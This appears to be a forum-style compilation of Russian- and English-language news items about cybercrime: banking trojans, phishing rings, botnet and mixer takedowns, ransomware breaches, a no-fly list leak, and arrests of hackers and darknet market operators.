Впервые активность Godfather заметили в июне 2021 г. В июне 2022 г. он перестал функционировать, но в сентябре 2022 г. Godfather вернулся, уже с измененным функционалом. По данным Group-IB, в основе Godfather лежит одна из версий другого банковского трояна Anubis, чей исходный код был обнародован еще в 2019 г. Разработчики Godfather модернизировали его под более новые версии Android, а также усилили механизмы противодействия обнаружению средствами антифрода.
О работе трояна Godfather слышали и другие эксперты по информационной безопасности. «Это даже не один троян, это семейство троянов, которые созданы по одним лекалам», — обращает внимание технический директор АО «Синклит» Лука Сафонов. Пока Godfather не очень распространен, констатирует эксперт. В то же время, поскольку перевод средств из-за рубежа в РФ в настоящий момент осложнен, в России активность подобного рода хакеров, атакующих пользователей за границей, снижается, добавляет Сафонов.
Первые образцы вируса известны с конца 2021 г., самые свежие версии датируются серединой декабря 2022 г., добавляет руководитель отдела обнаружения вредоносного ПО экспертного центра безопасности компании Positive Technologies Алексей Вишняков.
По его словам, в течение этого периода вирус не претерпел существенных изменений в наборе своих функций: в частности, крадет SMS-сообщения, перенаправляет звонки на другой телефон, переводит денежные средства с помощью USSD-вызовов и др., добавляет он.
Поскольку троян для своего распространения маскируется под турецкое приложение, можно предположить, что он нацелен преимущественно на пользователей Турции, добавляет эксперт по кибербезопасности в «Лаборатории Касперского» Татьяна Шишкова.
Со своей стороны Group-IB, помимо стандартных рекомендаций не переходить по подозрительным ссылкам и не скачивать что-либо со сторонних источников, рекомендует пользователям чаще проверять обновления своего смартфона: последние версии Android менее восприимчивы к атакам злоумышленников. Также рекомендуется следить за используемыми приложениями разрешениями. Например, в случае с Godfather криптокалькулятор, под который он маскировался, требовал разрешения на доступ к функциям управления устройством для людей с ограниченными возможностями.
Трое мужчин получали деньги от своих жертв, отправляя им фишинговые электронные письма, которые были клонами сообщений из настоящих немецких банков.
Немецкая Bundeskriminalamt, федеральная криминальная полиция, вчера провела рейды в домах трех человек, подозреваемых в организации крупномасштабных фишинговых атак, в результате которых у интернет-пользователей было украдено 4 000 000 евро.
Один из трех человек, 24-летний гражданин Германии, был арестован и обвинен в краже, в то время как второму 40-летнему гражданину также были предъявлены обвинения в 124 актах компьютерного мошенничества. Следствие по делу третьего подозреваемого продолжается.
На основании доказательств, собранных Управлением по борьбе с компьютерными преступлениями Германии, фишинговые операции, приписываемые обвиняемым, были совершены в период с 3 октября 2020 года по 29 мая 2021 года. Трое мужчин получали деньги от своих жертв, отправляя им фишинговые электронные письма, которые были клонами сообщений из настоящих немецких банков.
Федеральная криминальная полиция отмечает, что подделка была очень качественной и ее практически невозможно отличить от подлинной банковской электронной почты.
Электронные письма информировали получателей о предстоящих изменениях в системе безопасности банка, что неизбежно отразится на их учетных записях. Чтобы гарантировать, что они смогут продолжать пользоваться услугами банка, жертвам было предложено перейти на фишинговый веб-сайт, тем самым передав свои учетные данные мошенникам. Помимо этого, жертв просили ввести свой TAN (номер аутентификации транзакции), который представляет собой одноразовый код для онлайн-транзакций, позволяющий хакерам получить доступ к своим счетам в электронном банке и снимать средства.
Как упоминалось в заявлении Bundeskriminalamt, злоумышленники даже осуществили DDoS-атаку на банки, надеясь, что это поможет скрыть их мошеннические транзакции.
«Веб-сайты, серверы и сети компаний были перегружены массой автоматических запросов, в результате чего онлайн-сервисы были недоступны или их доступность была сильно ограничена», — поясняется в объявлении Bundeskriminalamt.
«Сообщается, что для совершения своих преступлений обвиняемые прибегали к предложениям от других киберпреступников, которые работают в даркнете и продают различные формы кибератак как услугу».
Если вы получили электронное письмо, якобы отправленное вашим банком и в котором вас просят принять меры для решения проблемы, не нажимайте никакие встроенные кнопки или URL-адреса. Вместо этого откройте новую вкладку, используйте поисковую систему, чтобы посетить официальный сайт банка и войдите на портал для клиентов, чтобы просмотреть любые оповещения или уведомления.
Наконец, никогда не вводите данные своей учетной записи, пока не убедитесь, что домен на который вы попали является реальным.
махинаций и других преступных действий с использованием кибертехнологий".
Соединенные Штаты при участии Великобритании, Германии, Латвии, Нидерландов, Румынии и Франции в рамках "одной из крупнейших в истории США операции по борьбе с ботнетами" ликвидировали хакерскую сеть Qakbot. Об этом говорится в распространенном заявлении директора американского Федерального бюро расследований (ФБР) Кристофера Рея.
По его словам, киберпреступники использовали Qakbot "для вымогательств, финансовых махинаций и других преступных действий с использованием кибертехнологий". "ФБР нейтрализовало эту широкомасштабную преступную цепочку, пресекло ее на корню", - добавил руководитель бюро. Он рассказал, что хакеры использовали одноименное вредоносное программное обеспечение (ПО), которое заразило более 700 тыс. компьютеров и "способствовало распространению вирусов- вымогателей, нанесло ущерб в сотни миллионов долларов предприятиям, медицинским учреждениям и государственным структурам по всему миру".
После того как разработанное еще в 2008 году Qakbot загружалось на компьютер, оно начинало скачивать дополнительные вредоносные программы, в том числе и вирусы-вымогатели. Кроме того, данное устройство становилось частью ботнета и могло удаленно управляться хакерами. При этом пользователи зараженных компьютеров, как правило, даже не подозревали о том, что стали жертвами этого ПО. Как пояснил Рей, для ликвидации сети ФБР перенаправляло трафик Qakbot на контролируемые бюро серверы, которые загружали на зараженные компьютеры удаляющий данное вредоносное ПО файл. Он отключал зараженные компьютеры от ботнета и предотвращал установку дополнительных вредоносных программ.
source: fbi.gov/news/stories/fbi-partners-dismantle-qakbot-infrastructure-in- multinational-cyber-takedown
Британка из Восточного Йоркшира за 2 года обманула по меньшей мере 26 человек на 57791 фунтов стерлингов (80134 долларов). Аферистка втиралась в доверие к своим “клиентам”, пользуясь их состоянием. Все деньги она “спустила” на азартные игры и месячную поездку в Испанию.
Об этом сообщает APnews со ссылкой на Metro.
Сообщается, что организатор свадеб, 44-летняя Дана Твидейл, внушала своим жертвам, что у нее проблемы в жизни, включая трудное финансовое положение, влюбляла в себя, выдумывая разные истории из ее жизни.
Одной из жертв стал Найджел Уэйнротом, с которым британка познакомилась в Tinder в сентябре 2018 года, через 2 месяца после смерти его отца.
Во время свиданий женщина выдумала смерть своей матери и, воспользовавшись состоянием Уэйнрота, попросила мужчину занять у его матери 3000 фунтов стерлингов (4159 долларов), чтобы аферистка смогла оплатить надгробие. Она заверила его, что по наследству ей принадлежит около 29000 фунтов стерлингов (40212 долларов). Из-за подавленного состояния после смерти отца Уэйнрот в течение 10 месяцев регулярно перечислял ей деньги - всего 42000 фунтов стерлингов (58238 долларов). Во время одной из встреч она солгала, что стала жертвой домашнего насилия, нарисовав синяки.
Также Дана Твидейл обманула 24 пары на 15000 фунтов стерлингов (20800 долларов) во время организации их свадеб, находясь при этом в Испании. Жертвы заплатили ей за услуги, которые она никогда не предоставляла.
Еще с одной женщиной, Фионой Баркер, она познакомилась в похоронном бюро. Дана выдумала очередную историю о том, что она попала в больницу после попытки ее брата совершить самоубийство. Рассказ нашел отклик у очередной жертвы, чей сын недавно умер, и она также решила помочь аферистке.
Позже выяснилось, что все деньги мошенница “спустила” на азартные игры и месячную поездку в Испанию
Аферистку поймали в 2019 году и выдвинули обвинения по 26 пунктам. Свою вину она признала. В итоге Дана Твидейл получила 5-летний тюремный срок и требование возместить ущерб жертвам в размере 57791 фунтов стерлингов (80134 долларов).
Серверы Международного комитета Красного Креста подверглись крупной кибератаке. Об этом сообщает сама организация.
В результате действий хакеров были скомпрометированы персональные данные 515 тысяч человек. В основном, это были крайне уязвимые группы — люди, разлученные с семьями из-за военных конфликтов или стихийных бедствий, пропавшие без вести или находящиеся в заключении.
Кто стоит за атакой, пока неясно. Красный Крест призвал хакеров «поступить правильно» и не распространять и не продавать полученные данные, чтобы не навредить людям, которые и так находятся в сложной ситуации.
Как подчеркнули в Красном Кресте, распространение информации об этих людях во
многих случаях несет повышенный риск для их безопасности.
(C) медуза
Полиция провинции Онтарио (OPP) поблагодарила эмитента стейблкоинов Tether за помощь в расследовании, заморозив около 10 000 канадских долларов (7 186 долларов США) в стейблкоинах Tether, украденных у человека, которые впоследствии были возвращены жертве.
Tether работал вместе с группой кибер-расследований OPP над возвратом средств,
и после успешной операции Эддисон Хантер, старший сержант OPP, заметил:
«При добровольной помощи и сотрудничестве Tether International Ltd. украденные
цифровые активы были успешно изъяты и возвращены жертве. Это сотрудничество
сыграло важную роль в обеспечении быстрого возвращения активов».
Генеральный директор Tether Паоло Адоино также подчеркнул приверженность компании «поддержке усилий правоохранительных органов по борьбе с киберпреступностью» и продолжит работать с представителями правоохранительных органов по всему миру, чтобы «привлекать злоумышленников к ответственности и, в конечном итоге, оказывать поддержку жертвам».
А вы еще пользуетесь тезером?)))))
В субботу 30 сен 2023 г. Microsoft детектировала tor.exe (0.4.7.15) как трояна (Win32/Malgent!MTB) и в настоящее время безоговорочно удаляет tor.exe в своих системах Windows по всему миру.
Обновленный tor.exe (0.4.7.15) автоматически получили все пользователи Tor Browser 26 сен 2023 в версии 12.5.5, а также 29 сен 2023 версии 12.5.6.
Каких-либо официальных комментариев от команды TorProject ни на форуме, ни в блоге на момент написания заметки нет.
Несмотря на всю анонимность криптовалют, хакер, ограбивший фонд DAO в 2016 году, не смог скрыть свою личность.
Журнал Forbes опубликовал результаты масштабного расследования одного из крупнейших киберограблений в истории Ethereum. Расследование вела журналистка Лора Шин (Laura Shin) при участии специалистов в области криптовалют и с помощью секретного инструмента компании Chainalysis, благодаря которому удалось собрать данные о транзакциях из кошелька Wasabi Wallet.
Речь идет о похищении эфира на сумму более $11 млрд (по курсу на сегодняшний день) у венчурного фонда DAO в 2016 году. Похитителем оказался австрийский программист Тоби Хениш (Toby Hoenisch). Хакер воспользовался сбоем в сети и смог непрерывно выводить эфир со счетов фонда. За похищенные средства он купил токены Ethereum Classic, а за них – биткойны.
По словам Шин, миксер CoinJoin, который использовался криптокошельком Wasabi Wallet Хениша, не помог хакеру скрыть свою личность. Информаторы журналистки и секретный инструмент от Chainalysis позволили отследить транзакции и в итоге выйти на самого хакера. В частности, удалось выяснить, что злоумышленник перевел средства в новый кошелек, неактивный с конца октября, а затем попытался использовать обменник ShapeShift, чтобы обменять средства на биткойны.
Согласно опубликованному Forbes расследованию, на последнем и решающем этапе сотрудник одной из бирж подтвердил источнику Шин, что средства были обменены на монету конфиденциальности Grin и выведены на узел Grin под названием grin. .toby.ai. Он также пояснил, что из-за политики конфиденциальности биржи такая информация о клиентах обычно не разглашается.
По словам Шин, «одно из первых применений криптовалют в качестве щита для анонимности исчезает». Это связано с растущим давлением регуляторов и тем фактом, что транзакции в публичных блокчейнах отслеживаются.
Как отметила журналистка, по мере появления новых приложений анонимность в
криптовалютных транзакциях будет продолжать снижаться.
«История DAO и шестилетнего поиска хакера демонстрирует, как далеко
продвинулись криптомир и технологии отслеживания транзакций с момента первого
увлечения криптовалютой», - подытожила Шин.
source: forbes.com/sites/laurashin/2022/02/22/exclusive-austrian-programmer- and-ex-crypto-ceo-likely-stole-11-billion-of-ether/
A ransomware attack against the widely used payment processor ATFS has sparked data breach notifications from numerous cities and agencies within California and Washington.
Automatic Funds Transfer Services (AFTS) is used by many cities and agencies
in Washington and other US states as a payment processor and address
verification service. As the data is used for billing and verifying customers
and residents is wide and varied, this attack could have a massive and
widespread impact.
The attack occurred around February 3rd when a cybercrime gang known as 'Cuba
ransomware' stole unencrypted files and deployed the ransomware.
The cyberattack has since caused significant disruption to AFTS' business
operations, making their website unavailable and impacting payment processing.
When visiting their site, people are greeted with a message, stating, "The
website for AFTS and all related payment processing website are unavailable
due to technical issues," as shown below.
BleepingComputer discovered that the attack was conducted by a cybercrime
operation known as 'Cuba Ransomware' after the hackers began selling AFTS'
stolen data on their data leak site.
Like other human-operated ransomware, Cuba will breach a network, spread
slowly through servers while stealing network credentials and unencrypted
files, and finally end the attack by deploying the ransomware to encrypt
devices.
If the ransomware gang cannot find a buyer for the data, they will likely
release it for free, allowing the data to be used by other threat actors.
Due to the large amount of potential data allegedly stolen by the Cuba Ransomware operation, cities utilizing AFTS as their payment processor or address verification service have begun disclosing potential data breaches.
The potential data exposed varies depending on the city or agency, but may include names, addresses, phone numbers, license plate numbers, VIN numbers, credit card information, scanned paper checks, and billing details.
Below we have listed the cities and agencies that have released data breach notification, with more likely to follow in the future.
Проект Ransomwhere, созданный студентом Стэнфордского университета и ИБ-исследователем из Krebs Stamos Group Джеком Кейблом, создает бесплатную и открытую базу данных о платежах, которые были переведены различным вымогательским хак-группам.
Эта БД, лишенная какой-либо личной информации, будет доступна ИБ-специалистам и сотрудникам правоохранительных органов для бесплатной загрузки. К сожалению, такая база может быть легко испорчена поддельными материалами, но чтобы противостоять этому, Кейбл планирует изучать все представленные материалы, а в будущем планирует добавить систему голосования для отдельных лиц, чтобы можно было помечать отчеты как поддельные.
В целом сайт очень прост: он позволяет жертвам атак шифровальщиков и специалистам по безопасности передать Ransomwhere копии своих записок с требованием выкупа, а также сообщить о размере выкупа и биткоин-адресе, по которому жертвы перевели платеж. Затем этот адрес будет проиндексирован в общедоступной БД.
Основная идея заключается в создании централизованной системы, которая отслеживает платежи, отправленные хакерами, что позволит точнее оценить масштабы их прибылей и операций, о которых известно очень мало. Создатель проекта надеется, что анонимный обмен данными о платежах через сторонний сервис, такой как Ransomwhere, устранит некоторые барьеры в с ИБ-ообществе, такие как соглашения о неразглашении и деловую конкуренцию.
Пока для расширения своей базы Кейбл опирается лишь на публично доступные материалы, но исследователь [сообщил изданию The Record](https://therecord.media/ransomwhere-project-wants-to-create-a- database-of-past-ransomware-payments/), что он уже изучает «возможности партнерства с аналитическими компаниями в области ИБ и блокчейна для интеграции данных, которые они, возможно, имеют о пострадавших».
Журналисты отмечают, что запуск проекта Ransomwhere очень похож на запуск проекта ID-Ransomware, созданного Майклом Гиллеспи в начале 2016 года. Изначально это был сайт, на который жертвы хакеров могли загрузить полученные записки с требованием выкупа, а сайт сообщал им, какое семейство малвари атаковало их системы, и где они могут получить помощь в восстановлении файлов. В итоге ID-Ransomware стал незаменимым инструментом для многих специалистов по реагированию на инциденты.
**
National authorities took down the platform 's infrastructure, seizing four
servers and 7 terabytes of data.ChipMixer laundered money for ransomware
perpetrators, darknet markets, fraudsters and state-sponsored actors,
according to the U.S. Department of Justice (DOJ).**
Authorities from Germany and the U.S. have seized up to 44 million euros ($46.3 million) from ChipMixer, a noted [cryptocurrency mixer](https://www.coindesk.com/learn/bitcoin-mixers-how-do-they-work-and-why- are-they-used/), according to the [European Union Agency for Law Enforcement Cooperation](https://www.europol.europa.eu/media-press/newsroom/news/one-of- darkwebs-largest-cryptocurrency-laundromats-washed-out) (Europol).
The authorities took down the platform's infrastructure, seizing four servers, 7 terabytes of data and 1909.4 bitcoins (BTC) ($47.7 million), Europol said on Wednesday.
The seizure was also supported by Belgium, Poland and Switzerland.
One operator of ChipMixer, Minh Quốc Nguyễn, from Hanoi, Vietnam, was charged on Wednesday in Philadelphia with money laundering, operating an unlicensed money transmitting business and identity theft, the DOJ said.
The platform is believed to have enabled the laundering of 152,000 BTC – around $3.8 billion at current prices – since 2017, a large share of which was connected to ransomware groups, illicit goods trafficking and child sexual exploitation.
According to the DOJ, activities enabled by ChipMixer include over $700 million in bitcoin associated with wallets designated as stolen funds, including those related to heists by North Korean cyber actors, and bitcoin used by the Russian General Staff Main Intelligence Directorate (GRU) to purchase infrastructure for Linux-based malware Drovorub.
Mixing services gained increased prominence in August 2022 when Ethereum-based mixer Tornado Cash was sanctioned by the U.S. Treasury Department’s Office of Foreign Asset Control for facilitating North Korea’s money-laundering operations. Shortly after that, Tornado Cash’s web developer Alexey Pertsev [was arrested](https://www.coindesk.com/policy/2022/08/21/arrest-of-tornado-cash- developer-draws-dutch-crypto-community-protest/).
Source: [CoinDesk](https://www.coindesk.com/policy/2023/03/15/germany-and-us- seize-over-46m-crypto-tied-to-chipmixer-investigation-europol/)
Было установлено что четверо жителей Санкт-Петербурга создали более 320 фишинговых сайтов по продаже компьютерной и бытовой техники по заниженным ценам. Для заказа на которых нужно было внести 100% предоплату.
В результате обысков у скамеров была изъята вся рабочая техника и банковский пластик, использовавшийся в качестве приемки.
В данный момент правоохранители возбудили 27 уголовных дел по факту мошенничества. Весь скам-квартет задержан и находится в СИЗО. Правоохранители пытаются установить всех шерстяных, пострадавших от рук скамеров.
Пентестер был лидером подростковой киберпреступной группировки.
Нидерландская полиция арестовала трех человек, включая этичного хакера, работающего в правительственном институте раскрытия уязвимостей. Преступники обвиняются в организации атак с двойным вымогательством, в ходе которых они опубликовали личные данные миллионов своих жертв в даркнете для использования другими киберпреступниками.
Спецслужбы Нидерландов в течение двух лет вели расследование в отношении злоумышленников. Сообщается, что группа хакеров в возрасте от 18 до 21 года за последние годы заработала более $2,6 млн. Требования выкупа группы составляли в среднем от $105 000 до $745 000.
Украденные личные данные включали в себя:
имена;
Примечательно, что главарём банды является 21-летний пентестер, который работал исследователем кибербезопасности в правительственном Нидерландском институте раскрытия уязвимостей (DIVD) и имел доступ к конфиденциальной информации. Более того, он принимал участие в конфиденциальных расследованиях DIVD. Менеджер DIVD заявил, что нет никаких признаков того, что этот этичный хакер был вовлечен в преступные дела. Однако после ареста ему был заблокирован доступ к системам DIVD.
source: politie.nl/nieuws/2023/februari/23/05-drie-mannen-aangehouden-in- onderzoek-naar-grootschalige-internationale-datadiefstal-en-datahandel.html
Исследователи RiskIQ рассказали, что новый фишинговый набор LogoKit был обнаружен более чем на 700 уникальных доменах только за последний месяц и на 300 за последнюю неделю. Хуже того, этот инструмент позволяет хакерам изменять логотипы и текст на фишинговых страницах в режиме реального времени, адаптируя сайты для конкретных целей.
В работе LogoKit полагается на отправку пользователям фишинговых ссылок, содержащих адреса их электронной почты. И как только жертва переходит по такому URL-адресу, LogoKit подтягивает логотип компании из стороннего сервиса, к примеру, Clearbit или из базы favicon’ов Google.

«Email-адрес жертвы тоже автоматически подставляется в поле адреса электронной почты или имени пользователя, чтобы пользователи считали, что ранее уже посещали этот сайт, — пишут эксперты. — Если жертва вводит свой пароль, LogoKit выполняет запрос AJAX, отправляя ее адрес электронной почты и пароль внешнему источнику, а после, наконец, перенаправляет пользователя на [законный] корпоративный сайт».
Click to expand...
Всего этого вредонос добивается через встраиваемый набор функций JavaScript, которые могут быть интегрированы в любую стандартную форму входа или в сложные HTML-документы. Именно это и является основным отличием LogoKit от других наборов для фишинга, так как большинству из них нужны точные до пикселя шаблоны, имитирующие страницы аутентификации конкретных компаний.
Аналитики отмечают, что модульность позволяет операторам LogoKit организовывать атаки на любую компанию, тратя на это минимум сил и времени. Так, за последний месяц LogoKit использовался для создания фейковых страниц логина, имитирующих самые разные сервисы: от обычных логин-порталов, до поддельных страниц входа в SharePoint, Adobe Document Cloud, OneDrive, Office 365 и нескольких криптовалютных обменников.
Так как LogoKit весьма мал и компактен, для его работы практически не требуется сложная настройка сервера, и набор может быть размещен, в том числе, на взломанных сайтах или настоящих страницах компаний, на которые нацелились операторы малвари. Хуже того, в силу того, что LogoKit представляет собой лишь набор JavaScript-файлов, его ресурсы могут быть размещены даже на Firebase, GitHub, Oracle Cloud и так далее. Большинство из них включены в белые списки корпоративных сред и могут показаться неопасными, как для защитных решений, так и для пользователей.
Источник: xakep.ru/2021/01/29/logokit/
Сообщение на главной странице:
_After trying endlessly for two years to run a file sharing site with user
anonymity we have been tired of handling the extreme volumes of people abusing
it and the headaches it has created for us.
Maybe it is hard to understand but after tens of million uploads and many
petabytes later all work of handling abuse was automated through all available
channels to be fast as possible.
We have auto banned contents of hundreds of thousands files.
Banned file names and also banned specific usage patterns connected to abusive
material to the point where we did not care if we accidental delete thousands
of false positive in this process.
Even after all this the high volume of abuse will not stop.
This is not the kind of work we imagine when acquiring it and recently our
proxy provider shut us down.
This can not continue.
Domain 4sale.
Испанская полиция объявила об аресте Хосе Луиса Уэртаса (José Luis Huertas), 19-летнего подростка, известного под никами Alcaseca, Mango и chimichuri. Власти называют Уэртаса «серьезной угрозой национальной безопасности» и создателем платформы Udyat («глаз Гора»), предназначенной для продажи краденной конфиденциальной информации в больших объемах.
В доме Уэртаса и по другим адресам уже прошли обыски, и правоохранители изъяли крупные суммы наличных, люксовый автомобиль, документацию и компьютеры.
Полицейское расследование в отношении Уэртаса было начато еще в ноябре 2022 года. Расследование началось после взлома компьютерной сети Генерального судебного совета Испании (CGPJ). Во время этой атаки взломщик похитил данные 575 000 налогоплательщиков (включая личную информацию, номера счетов, банковские номера и так далее) и создал БД для продажи этой информации другим киберпреступникам.
Уэртаса также обвиняют в том, что он выдавал себя за Паоло Василе, итальянского бизнесмена, кино- и телепродюсера, а также генерального директора Gestevisión Telecinco и Mediaset España, и краже 300 000 евро. Кроме того, обвинения включают атаки на высшие государственные учреждения и отмывание денег.
Стоит сказать, что с каждой атакой хакер становился все смелее, и в итоге на YouTube появилось интервью с ним (в ролике Уэртас скрывает свое лицо под балаклавой), где он заявлял, что имеет доступ к информации примерно 90% всех граждан Испании.
По данным местных СМИ, установить личность хакера, ответственного за перечисленные выше атаки, удалось, отследив оплату за услуги хостинга для серверов Udyat. Хотя Уэртас использовал криптовалюту, которая была предварительно «очищена» с помощью миксер-сервисов, полиция все же смогла отследить платежи с помощью экспертов из Национального центра криптологи.
Уэртас останется под стражей до суда, поскольку следователи считают, что оказавшись на свободе, он может уничтожить улики и продолжит совершать преступления аналогичного характера. Суд мотивировал свое решение оставить подозреваемого под стражей тем, что у Уэртаса есть значительные суммы в криптовалюте, которые позволят ему проживать в любой точке мира, избегая испанского правосудия.
source: policia.es/_es/comunicacion_prensa_detalle.php?ID=15523
source: elpais.com/espana/2023-04-04/chimichurri-y-mango-los-alias-que-
delatan-al-hacker-alcasec-en-su-ciberataque-contra-el-poder-judicial-y-
hacienda.html
**Незащищенный сервер, обнаруженный исследователем безопасности на прошлой неделе, содержал личные данные сотен тысяч людей из базы данных правительства США по отбору террористов и "Списка нелетающих". **
В список попали несколько известных личностей, в том числе недавно освобожденный российский торговец оружием Виктор Бут, а также более 16 потенциальных псевдонимов для него.
Click to expand...

Обнаруженный швейцарским хакером, известным как maia arson crimew, сервер, управляемый национальной авиакомпанией США CommuteAir, был оставлен в открытом доступе в Интернете. На нем было обнаружено огромное количество данных компании, включая частную информацию о почти 1 000 сотрудников CommuteAir.
В результате анализа сервера был обнаружен текстовый файл под названием "NoFly.csv" - ссылка на подгруппу лиц в базе данных террористического скрининга, которым запрещены авиаперелеты из-за подозрений или известных связей с террористическими организациями.
По данным crimew, список насчитывал в общей сложности более 1,5 миллиона записей. Данные включали имена и фамилии, а также даты рождения. В список также включены многочисленные псевдонимы, поэтому число уникальных лиц намного меньше 1,5 миллиона.
В список попали несколько известных личностей, в том числе недавно освобожденный российский торговец оружием Виктор Бут, а также более 16 потенциальных псевдонимов для него.
Псевдонимы включали различные, часто встречающиеся неправильные написания его фамилии и другие варианты его имени, а также различные дни рождения. Многие дни рождения совпадали с зарегистрированной датой рождения Бута.
В список также попали подозреваемые члены ИРА, ирландской военизированной организации.
Еще один человек, по данным crimew, был указан в списке как 8-летний, исходя из года рождения.
Многие имена в списке были арабского или ближневосточного происхождения, хотя в списке также были латиноамериканские и англиканские имена. Многие имена включали псевдонимы, которые представляли собой обычные опечатки или слегка измененные варианты их имен.
"Меня просто поражает, насколько велика эта база данных Terrorism Screening Database, и, тем не менее, среди миллиона записей все еще прослеживается четкая тенденция к тому, что имена звучат почти исключительно по-арабски и по- русски", - сказал Кримью.
"За последние 20 лет граждане США, которые, как мы видим, стали объектом слежки, в непропорционально большой степени мусульмане и люди арабского, ближневосточного и южно-азиатского происхождения", - сказала Хина Шамси, директор проекта по национальной безопасности Американского союза защиты гражданских свобод (ACLU). "Иногда это люди, которые инакомыслят или придерживаются непопулярных взглядов. Мы также видели журналистов
В заявлении для Daily Dot TSA сообщило, что ему "известно о потенциальном инциденте кибербезопасности с CommuteAir, и мы проводим расследование в координации с нашими федеральными партнерами".
ФБР отказалось отвечать на конкретные вопросы Daily Dot о списке.
В заявлении для Daily Dot компания CommuteAir сообщила, что открытая инфраструктура, которую она описала как сервер разработки, использовалась в целях тестирования.
CommuteAir добавила, что сервер, который был отключен до публикации после того, как Daily Dot обратил на него внимание, не раскрывал никакой информации о клиентах, как показало первоначальное расследование.
CommuteAir также подтвердила легитимность данных, заявив, что это была версия "федерального списка, запрещенного к полетам", составленная примерно за четыре года до этого.
"На сервере содержались данные из версии федерального запрещенного списка 2019 года, которые включали имена, фамилии и даты рождения", - сказал менеджер по корпоративным коммуникациям CommuteAir Эрик Кейн. "Кроме того, была доступна информация о некоторых сотрудниках CommuteAir и рейсах. Мы направили уведомление в Агентство по кибербезопасности и инфраструктурной безопасности и продолжаем полное расследование".
CommuteAir - региональная авиакомпания, базирующаяся в штате Огайо. В июне 2020 года CommuteAir заменила ExpressJet в качестве перевозчика для United Express Banner, регионального отделения United, выполняющего более короткие рейсы.
В своем комментарии для Daily Dot криминалисты заявили, что сделали это открытие во время поиска серверов Jenkins в специализированной поисковой системе Shodan. Jenkins предоставляет серверы автоматизации, которые помогают в создании, тестировании и развертывании программного обеспечения. Shodan используется в сообществе кибербезопасности для поиска серверов, находящихся в открытом доступе в Интернете.
На сервере также хранились номера паспортов, адреса и номера телефонов примерно 900 сотрудников компании. Учетные данные пользователей более чем 40 ведер Amazon S3 и серверов CommuteAir также были раскрыты, сказал Кримью.
База данных террористического скрининга, по данным ФБР, представляет собой список лиц, которые совместно используются правительственными ведомствами для предотвращения таких провалов в разведке, которые имели место до 11 сентября. Внутри этой базы находится более узкий и жестко контролируемый список лиц, запрещенных к полетам. На лиц, включенных в базу данных по скринингу терроризма, могут накладываться определенные ограничения и проводиться дополнительная проверка безопасности. Лицам, включенным в список лиц, запрещенных к полетам, запрещено садиться на самолеты в Соединенных Штатах.
"В нашей стране существует массивная, раздутая система "списков наблюдения", которая может клеймить людей - включая американцев - как известных или подозреваемых террористов на основе секретных стандартов и секретных доказательств без значимого процесса оспаривания ошибок правительства и очищения их имен", - сказал Шамси. "Категории людей, за которыми ведется наблюдение, кажутся все расширяющимися, никогда не сужающимися... Последствия этого значительны и наносят реальный вред жизни людей. Это и очевидное клеймо, и смущение, и жизненные трудности, связанные с невозможностью летать в наш современный век, с тем, что их выделяют, что их обыскивают. У нас были матери и отцы, которых клеймили позором и стыдили перед их детьми".
В течение длительного времени проводились оценки как базы данных проверки на терроризм, так и списка нелетающих пассажиров. По оценкам, база данных по проверке на терроризм содержит до 1 миллиона записей, а список нелетающих пассажиров, по сообщениям, гораздо меньше.
Когда компанию CommuteAir попросили дать разъяснения, она заявила, что у них хранится именно подмножество "Списка запрещенных полетов", что означает, что потенциально оно может быть гораздо больше, чем сообщалось ранее.
Однако эксперт, знакомый с контурами "Списка нелетающих", предупредил, что список такого размера может быть более крупной базой данных по скринингу терроризма, а не более мелким "Списком нелетающих".
Издание The Intercept в 2014 году ранее сообщало, что в No Fly List содержится более 47 000 имен. В 2016 году сенатор Дайэнн Файнстайн (Dianne Feinstein, D-Calif.) предположила, что в списке находится более 81 000 человек.
Хотя список является крайне секретным и редко подвергается утечке, он не считается секретным документом из-за количества агентств и лиц, которым необходим доступ к нему.
В своем заявлении в ACLU Г. Клейтон Григг, в то время заместитель директора по оперативной работе Центра отбора террористов, сказал, что хотя список содержит секретную информацию о национальной безопасности, "сохранение TDSB в качестве секретной, но несекретной системы позволяет сотрудникам правоохранительных органов .... использовать идентификационную информацию из TSDB, даже если они не обладают секретными или совершенно секретными допусками".
Находка crimew - это не первый случай, когда незащищенная версия базы данных Terrorist Screening Database была раскрыта в Интернете. Исследователь безопасности Владимир "Боб" Дьяченко нашел подробную копию списка террористов с 1,9 миллионами записей в 2021 году.
Имена, предоставленные Дьяченко изданием Daily Dot, совпали с записями в полученном им списке, хотя Дьяченко так и не получил официального подтверждения подлинности своего списка.
Список нелетающих пассажиров регулярно подвергается критике со стороны экспертов по защите частной жизни и гражданских свобод. ACLU успешно подал иск, чтобы граждане могли оспорить свое включение в список. Однако, по словам Шамси, необходимо проделать большую работу для повышения прозрачности списка.
"Это уже массивная и раздутая система, и ее рост - это именно то, что происходит, когда у вас есть расплывчатая и слишком широкая система того, что по сути является правительственной слежкой, основанной на подозрениях и без надлежащей правовой процедуры... Как минимум, если правительство собирается использовать списки, оно должно иметь узкие и конкретные публичные критерии [для включения] и применять строгие публичные процедуры для рассмотрения, обновления и удаления сомнительных записей".
Источник: <https://www.dailydot.com/debug/no-fly-list-us-tsa-unprotected- server-commuteair/>
Ирландская полиция изъяла криптовалюту на сумму около €6,5 миллиона в ходе расследования по делу о «тёмных рынках» и отмывании денег. Во время рейда на дом в северной части графства Дублин были задержаны три человека. Операцию проводили вооружённые подразделения полиции при поддержке специалистов из Национального бюро по борьбе с киберпреступностью.
В результате обыска правоохранители обнаружили значительные активы, включая криптовалюты Bitcoin и Monero на сумму примерно €6,5 миллиона. Помимо этого, были изъяты предметы роскоши, включая часы известных брендов стоимостью более €120 000 и два автомобиля, оценённые в €220 000.
Среди задержанных оказались двое мужчин в возрасте 23 и 49 лет, подозреваемые в содействии преступной организации в совершении тяжкого преступления. Также была задержана 32-летняя женщина по подозрению в нарушении законодательства об отмывании денег и финансировании терроризма.
49-летний мужчина и женщина были выпущены под залог и должны будут предстать перед судом в октябре этого года. Тем временем, 23-летнего Кевина Дэниела Эндрю полиция оставила под стражей, так как считает его администратором крупного даркнет-рынка. Предположительно, речь идёт о Bohemia Market, как раз и находившимся в центре расследования правоохранителей.
Детектив Майкл Муллен отметил, что аресты и изъятие активов стали результатом сложного расследования, проводимого специалистами бюро. По его словам, эти действия демонстрируют решимость Ирландии не позволять преступникам извлекать финансовую выгоду из незаконной деятельности, независимо от её формы.
Муллен также заверил, что тёмный рынок, на котором продавались нелегальные товары и услуги, больше не функционирует, что можно считать официальным подтверждением закрытия даркнет-маркета Bohemia.
• Source: https://www.securitylab[.]ru/news/551279.php
• Source: https://livedarknet[.]com/p/bohemia-darknet-market-admin-arrested/
